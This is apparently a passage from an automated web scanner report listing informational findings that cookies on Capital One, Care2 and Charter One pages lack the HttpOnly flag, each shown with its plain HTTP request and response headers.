Date: Wed, 02 Feb 2011 22:00:19 GMT
Server: Apache
Set-Cookie: v1st=FBBE6C4A1C9B8436; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: itc=CAPITALONE11NZZZintmktgD4; expires=Sun, 03-Apr-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; expires=Fri, 04-Mar-2011 22:00:19 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:18 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 39529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...

11.463. https://www.capitalone.com/creditcards/gateway/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /creditcards/gateway/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /creditcards/gateway/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:12:45 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com
Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com
Location: http://www.capitalone.com/creditcards/?
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=ISO-8859-1


11.464. https://www.capitalone.com/indexn.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /indexn.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /indexn.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:00:18 GMT
Server: Apache
Location: http://www.capitalone.com/
Cache-Control: max-age=0
Expires: Wed, 02 Feb 2011 22:00:18 GMT
Content-Length: 234
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.capitalone.c
...[SNIP]...

11.465. https://www.capitalone.com/scripts/thirdparty/xplus1/xp1vars.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.capitalone.com
Path:   /scripts/thirdparty/xplus1/xp1vars.js.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /scripts/thirdparty/xplus1/xp1vars.js.php HTTP/1.1
Host: www.capitalone.com
Connection: keep-alive
Referer: https://www.capitalone.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpl_capitalone.com_443=745088266.65056.0000; v1st=FBBE6C4A1C9B8436; itc=CAPITALONE11NZZZintmktgD4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:00:21 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:00:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive
Content-Type: application/x-javascript
Content-Length: 125

var xp1CC = "";
var xp1zip = "0";
var xp1region = "national";
var xp1eosSet = "N";
var xp1PageName = "";

11.466. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:32 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=06b1a9ee60ea3411d50706d6b4b05184%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=f857207c09785572124d4877b07e3ed2%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:32 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 143217

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...

11.467. http://www.charterone.com/401K_notice.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /401K_notice.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /401K_notice.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:27 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 5562


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.468. http://www.charterone.com/branchlocator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /branchlocator/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /branchlocator/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26553


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...

11.469. http://www.charterone.com/cards-and-rewards/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /cards-and-rewards/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards-and-rewards/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2>
</body></html>

11.470. http://www.charterone.com/cards-and-rewards/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /cards-and-rewards/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards-and-rewards/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcards-and-rewards%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcards-and-rewards%252fdefault.aspx">here</a>.</h2>
</body></html>

11.471. http://www.charterone.com/cards-and-rewards/defaultbroad.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /cards-and-rewards/defaultbroad.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cards-and-rewards/defaultbroad.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:14:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/error.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 138

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2ferror.aspx">here</a>.</h2>
</body></html>

11.472. http://www.charterone.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /careers/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /careers/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:16:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:26:23 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 19220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl0
...[SNIP]...

11.473. http://www.charterone.com/checking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /checking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fdefault.aspx">here</a>.</h2>
</body></html>

11.474. http://www.charterone.com/checking/banking-packages.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /checking/banking-packages.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/banking-packages.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fbanking-packages.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 196

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fbanking-packages.aspx">here</a>.</h2>
</body></html>

11.475. http://www.charterone.com/checking/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /checking/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 187

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fdefault.aspx">here</a>.</h2>
</body></html>

11.476. http://www.charterone.com/checking/gold-banking-package.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /checking/gold-banking-package.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/gold-banking-package.aspx?WT.ac=circlegoldmoneymarket HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2fgold-banking-package.aspx%3fwt.ac%3dcirclegoldmoneymarket
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 236

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252fgold-banking-package.aspx%253fwt.ac%253dcirclegoldmoneymark
...[SNIP]...

11.477. http://www.charterone.com/checking/order-checks.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /checking/order-checks.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /checking/order-checks.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fchecking%2forder-checks.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fchecking%252forder-checks.aspx">here</a>.</h2>
</body></html>

11.478. http://www.charterone.com/commercial-banking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /commercial-banking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /commercial-banking/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommercial-banking%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 197

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommercial-banking%252fdefault.aspx">here</a>.</h2>
</body></html>

11.479. http://www.charterone.com/community/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /community/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:16:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcommunity%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 188

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcommunity%252fdefault.aspx">here</a>.</h2>
</body></html>

11.480. http://www.charterone.com/customer-service/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /customer-service/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /customer-service/ HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 302 Found
Connection: close
Date: Wed, 02 Feb 2011 22:12:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /tools/regionalgateway.aspx?url=%2fcustomer-service%2fdefault.aspx
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: Referrer=url=; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 195

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftools%2fregionalgateway.aspx%3furl%3d%252fcustomer-service%252fdefault.aspx">here</a>.</h2>
</body></html>

11.481. http://www.charterone.com/everyday-points/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /everyday-points/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /everyday-points/default.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:32 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 12456


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_objCommonHeader_mSe
...[SNIP]...

11.482. http://www.charterone.com/everyday-points/terms-and-conditions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charterone.com
Path:   /everyday-points/terms-and-conditions.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /everyday-points/terms-and-conditions.aspx HTTP/1.1
Host: www.charterone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684049200-9490; ClrCSTO=T; WT_FPC=id=23b1ef31bcf943a33a31296687649101:lv=1296687649101:ss=1296687649101; ClrSCD=1296684049200; ClrSSID=1296684049200-9490;

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 22:15:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Wed, 02 Feb 2011 22:25:32 GMT
